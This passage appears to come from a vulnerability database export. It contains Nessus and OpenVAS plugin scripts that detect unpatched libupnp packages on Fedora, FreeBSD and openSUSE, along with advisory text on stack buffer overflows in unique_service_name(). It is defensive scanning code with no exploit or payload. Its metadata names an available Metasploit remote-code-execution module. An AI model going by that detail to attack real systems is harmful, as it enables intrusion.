Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098664.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb32bb09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"libupnp-1.6.18-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:10", "description": "libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-02-13T00:00:00", "title": "Fedora 17 : libupnp-1.6.18-1.fc17 (2013-1734)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-13T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:libupnp"], "id": "FEDORA_2013-1734.NASL", "href": "https://www.tenable.com/plugins/nessus/64600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1734.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64600);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"FEDORA\", value:\"2013-1734\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"Fedora 17 : libupnp-1.6.18-1.fc17 (2013-1734)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libupnp 1.6.18\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=883790\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098643.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fba244f5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libupnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"libupnp-1.6.18-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:40:59", "description": "Project changelog reports :\n\nThis patch addresses three possible buffer overflows in function\nunique_service_name(). The three issues have the following CVE numbers :\n\n- CVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\n\n- CVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt with by previous\nwork :\n\n- CVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\n\n- CVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\n\n- CVE-2012-5963 Issue #5: Stack buffer overflow of 
Event->UDN\n\n- CVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\n\n- CVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType", "edition": 22, "published": "2013-01-31T00:00:00", "title": "FreeBSD : upnp -- multiple vulnerabilities (2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-01-31T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:upnp"], "id": "FREEBSD_PKG_2EA6CE3D6AFD11E29D4EBCAEC524BF84.NASL", "href": "https://www.tenable.com/plugins/nessus/64374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"FreeBSD : upnp -- multiple vulnerabilities (2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Project changelog reports :\n\nThis patch addresses three possible buffer overflows in function\nunique_service_name().The three issues have the folowing CVE numbers :\n\n- CVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\n\n- CVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\n\n- CVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt by previous\nwork :\n\n- CVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\n\n- CVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\n\n- CVE-2012-5963 Issue #5: Stack buffer overflow of 
Event->UDN\n\n- CVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\n\n- CVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType\"\n );\n # https://vuxml.freebsd.org/freebsd/2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a445997f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:upnp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"upnp<1.6.18\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:27:04", "description": " - Update to version 1.6.18 (bnc#801061)\n\n + Security fix for CERT issue VU#922681 This patch\n addresses three possible buffer overflows in function\n unique_service_name(). 
The three issues have the\n following CVE numbers: CVE-2012-5958 Issue #2:\n Stack-based buffer overflow of Tempbuf CVE-2012-5959\n Issue #4: Stack-based buffer overflow of Event->UDN\n CVE-2012-5960 Issue #8: Stack-based buffer overflow of\n Event->UDN\n\n + Notice that the following issues have already been dealt\n with by previous work: CVE-2012-5961 Issue #1: Stack-based\n buffer overflow of Evt->UDN CVE-2012-5962 Issue #3:\n Stack-based buffer overflow of Evt->DeviceType\n CVE-2012-5963 Issue #5: Stack-based buffer overflow of\n Event->UDN CVE-2012-5964 Issue #6: Stack-based buffer\n overflow of Event->DeviceType CVE-2012-5965 Issue #7:\n Stack-based buffer overflow of Event->DeviceType", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : libupnp (openSUSE-SU-2013:0255-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libupnp6", "p-cpe:/a:novell:opensuse:libupnp6-debuginfo", "p-cpe:/a:novell:opensuse:libupnp-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:libupnp6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libupnp6-32bit", "p-cpe:/a:novell:opensuse:libupnp6-debugsource", "p-cpe:/a:novell:opensuse:libupnp-debugsource", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-90.NASL", "href": "https://www.tenable.com/plugins/nessus/75214", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-90.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75214);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\", \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_xref(name:\"TRA\", value:\"TRA-2017-10\");\n\n script_name(english:\"openSUSE Security Update : libupnp (openSUSE-SU-2013:0255-1)\");\n script_summary(english:\"Check for the openSUSE-2013-90 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Update to version 1.6.18 (bnc#801061)\n\n + Security fix for CERT issue VU#922681 This patch\n addresses three possible buffer overflows in function\n unique_service_name(). The three issues have the\n folowing CVE numbers: CVE-2012-5958 Issue #2:\n Stack-based buffer overflow of Tempbuf CVE-2012-5959\n Issue #4: Stack-based buffer overflow of Event->UDN\n CVE-2012-5960 Issue #8: Stack-based buffer overflow of\n Event->UDN\n\n + Notice that the following issues have already been dealt\n by previous work: CVE-2012-5961 Issue #1: Stack-based\n buffer overflow of Evt->UDN CVE-2012-5962 Issue #3:\n Stack-based buffer overflow of Evt->DeviceType\n CVE-2012-5963 Issue #5: Stack-based buffer overflow of\n Event->UDN CVE-2012-5964 Issue #6: Stack-based buffer\n overflow of Event->DeviceType CVE-2012-5965 Issue #7:\n Stack-based buffer overflow of Event->DeviceType\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-02/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libupnp packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Portable UPnP SDK unique_service_name() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libupnp6-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp-devel-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-debuginfo-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libupnp6-debugsource-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libupnp6-32bit-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libupnp6-debuginfo-32bit-1.6.18-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp-debugsource-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp-devel-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp6-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"libupnp6-debuginfo-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", 
reference:\"libupnp6-32bit-1.6.18-6.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"libupnp6-debuginfo-32bit-1.6.18-6.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libupnp-devel / libupnp6 / libupnp6-32bit / libupnp6-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:1361412562310865345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865345", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1713\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"libupnp on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098665.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865345\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-15 11:13:21 +0530 (Fri, 15 Feb 2013)\");\n script_cve_id(\"CVE-2012-5958\", \"CVE-2012-5959\", \"CVE-2012-5960\", \"CVE-2012-5961\",\n \"CVE-2012-5962\", \"CVE-2012-5963\", \"CVE-2012-5964\", \"CVE-2012-5965\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1713\");\n script_name(\"Fedora Update for libupnp FEDORA-2013-1713\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libupnp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"libupnp\", rpm:\"libupnp~1.6.18~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-24T11:10:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "Check for the Version of libupnp", "modified": "2018-01-24T00:00:00", "published": "2013-02-15T00:00:00", "id": "OPENVAS:865353", "href": "http://plugins.openvas.org/nasl.php?oid=865353", "type": "openvas", "title": "Fedora Update for libupnp FEDORA-2013-1734", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libupnp FEDORA-2013-1734\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, 